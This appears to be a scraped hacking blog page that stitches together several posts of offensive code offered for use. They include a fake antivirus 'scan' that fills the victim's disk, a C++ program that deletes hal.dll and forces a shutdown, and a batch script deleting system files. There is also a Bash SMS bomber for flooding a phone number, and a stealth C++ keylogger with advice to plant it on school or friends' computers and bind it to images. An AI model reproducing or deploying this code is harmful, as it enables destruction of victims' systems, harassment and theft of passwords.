fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}


How to Run this ?
Download and install the Turbo c
copy this code into notepad
and save the file with .c extension (for eg: spaceater.c)
copy the file to C:\TC\BIN folder
now open the command prompt
navigate to the C:\TC\BIN folder in cmd (if you don't know about how to do this comment here, ask in my forum).
type as "tcc file.c" (replace the file with your file name for eg: tcc spaceater.c).
That's all you finished
Now go to C:\TC\BIN folder
you can find the .exe will with your file name (for eg: spaceater.exe)
Don't open it. then it will attack you.

If you suppose became the victim of virus,then do this:
go to start->run
type as "%systemroot%system32
and search for "spaceshot.dll"
Remove that file.

How to create a Big size file ?



You can create a big size file using windows default command prompt itself.  Why we need huge size file? When you create virus  or you can use in your college for occupying the memory.

First of all Decide the Size of  huge file.  For eg, if you decide 1 milliion byte,then we should convert it to Hexadecimal format.  Use the Windows Calculator in Scientific mode to convert to Hexadecimal.



we are planned to create 1 million byte sized file.  So,Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits 000F4240.

  • Now goto start->run
  • Enter "cmd" to open the window.
  •  Enter the command DEBUG BIGFILE.DAT and ignore the File not found message
  •  Type RCX and press Enter. 
  • Debug will display a colon prompt.
  • Enter the last four digits of the hexadecimal number you calculated (4240, in our example). 
  •  Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). 
  • Enter W for Write and Q for Quit.
  • You've just created a 1-million-byte file using Debug. 
  • Of course you can create a file of any desired size using the same technique.

C++ virus that deletes the hal.dll file in system32



Hi in this article i will give you the c++ virus code.  Don't use for any illegal purpose.  This is just for learning purpose only.
#include<stdio.h>
#include<stdlib.h>

using namespace std;


int main(int argc, char *argv[])

{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
Above code will find the system32 folder and deletes the "hal.dll" file



Hal.dll


Hal.dll is Windows' Hardware Abstraction Layer, or HAL. The HAL implements a number of functions that are implemented in different ways by different hardware platforms, which in this context, refers mostly to the Chipset. Other components in the operating system can then call these functions in the same way on all platforms, without regard for the actual implementation. For example, responding to an interrupt is quite different on a machine with an APIC (Advanced Programmable Interrupt Controller) than on one without. The HAL abstracts such differences so that nothing outside the HAL need be concerned with them.


The HAL is loaded into kernel address space and runs in kernel mode, so routines in the HAL cannot be called directly by applications, and no user mode APIs correspond directly to HAL routines. Instead the HAL provides services primarily to the Windows executive and kernel and to kernel mode device drivers. Although drivers for most hardware are contained in other files, commonly of file type .sys, a few core drivers are compiled into Hal.dll.

Kernel mode device drivers for devices on buses such as PCI and PCI Express directly call routines in the HAL to access I/O ports and registers of their devices. The drivers use HAL routines because different platforms may require different implementations of these operations. The HAL implements the operations appropriately for each platform, so the same driver executable file can be used on all platforms using the same CPU architecture, and the driver source file can be portable across all architectures.


On x86 systems there are several different HAL files on the installation media. The Windows installation procedure determines which ones are appropriate for the current platform and copies it to the hard drive, renaming it to Hal.dll if necessary. Among the criteria for this selection are the presence of an ACPI-compatible BIOS, the presence of an Advanced Programmable Interrupt Controller (APIC), and whether or not multiple processors are present and enabled. (The multiple cores of a multi-core CPU, and even the "logical processors" implemented by a hyperthreading CPU, all count as "processors" for this purpose.) On x86-64 and Itanium platforms there is just one possible Hal.dll for each CPU architecture.


Source:wikipedia.com

Virus to Delete mouse,explore,logoff using Batch Programming


Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.


@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.

Command Line SMS Bomber for linux users


A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You'll need to install 'ssmtp'

If you're using Ubuntu or BT4 you can type:

Code:
sudo apt-get install ssmtp

You'll also need a Gmail account (I'm sure you could use another e-mail service, just make changes accordingly).

Then you'll need to edit the configuration file (located at /etc/ssmtp/ssmtp.conf)

Where it says:

Code:
# The place where the mail goes. The actual machine name is required no
# MX records are consulted. Commonly mailhosts are named mail.domain.com
mailhub=whatever
Change it to mailhub=smtp.gmail.com:587



Then add this at the end of the configuration file:

Code:
AuthUser=YOURUSERNAME@gmail.com
AuthPass=YOURPASSWORD
UseSTARTTLS=YES

Then, you'll need to save the following code as whatever you want (I call it smsbomber):
#! /bin/bash

COUNTER=0
SPEED=2
function usage {
echo "USAGE: $0 [OPTIONS] ... [ARGUMENTS]"
echo
echo "-p Phone Number"
echo "-c Carrier Code"
echo "-o Display Carrier Codes"
echo "-m Message to Send"
echo "-t Number of Times to Send Message"
echo "-d Delay (in seconds) Between Messages"
echo "-h This Help Screen"
echo
echo "You can check the carrier of a phone number"
echo "at www.fonefinder.net"
echo
echo "Instead of using a preset carrier code, you"
echo "can enter the SMS gateway of the carrier"
echo "using the '-c' option."
echo
echo "Written by MrPockets (aka GhostNode) and disk0"
exit
}

function carriers {
echo "Carrier Codes:"
echo
echo "1 AT&T"
echo "2 Boost Mobile"
echo "3 Cingular"
echo "4 Nextel"
echo "5 Sprint"
echo "6 Verizon or Straigh Talk"
echo "7 T-mobile"
echo "8 TracFone"
echo "9 US Cellular"
echo "10 Virgin Mobile"
exit
}

if [ "$1" == "" ]; then
usage
fi
while [ "$1" != "" ]; do
case "$1" in

'-p')
shift
NUMBER=$1
;;
'-c')
shift
case "$1" in
'1')
GATEWAY="@txt.att.net"
;;
'2')
GATEWAY="@myboostmobile.com"
;;
'3')
GATEWAY="@cingular.com"
;;
'4')
GATEWAY="@messaging.nextel.com"
;;
'5')
GATEWAY="@messaging.sprintpcs.com"
;;
'6')
GATEWAY="@vtext.com"
;;
'7')
GATEWAY="@tmomail.net"
;;
'8')
GATEWAY="@mmst5.tracfone.com"
;;
'9')
GATEWAY="@email.uscc.net"
;;
'10')
GATEWAY="@yrmobl.com"
;;
*)
GATEWAY=$1
;;
esac
;;
'-m')
shift
MESSAGE=$1
;;
'-d')
shift
SPEED=$1
;;
'-t')
shift
TIMES=$1
;;
'-h')
usage
;;
'-o')
carriers
;;
*)
usage
;;
esac
shift
done

echo >> delivery
echo >> delivery
echo $MESSAGE >> delivery
clear
echo " Attacking Device at: $NUMBER "
echo " With Message: $MESSAGE "

until [ $TIMES -le $COUNTER ]; do
ssmtp $NUMBER$GATEWAY < delivery sleep $SPEED COUNTER=$(($COUNTER +1)) echo ================================== echo echo "Attack $COUNTER of $TIMES" echo echo Message: $MESSAGE date echo "Ctrl+C to call off attack" echo ================================== done rm 1.txt rm delivery

Make sure you change the permissions to make it executable:

Code:
sudo chmod 777 smsbomber

Then you can just type ./smsbomber or ./smsbomber -h for the help menu. You gues should be able to figure it out from there! Let me know what you think!

How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.



About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

Learn To create Keylogger using C++|Basic Hacking Tutorials


Hi friends, the most interesting part  of the hacking is spying.  Today 
I am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.



Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)


Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.



bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.
 
© Copyright 2010-2011 Media Pengetahuan All Rights Reserved.
Template Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.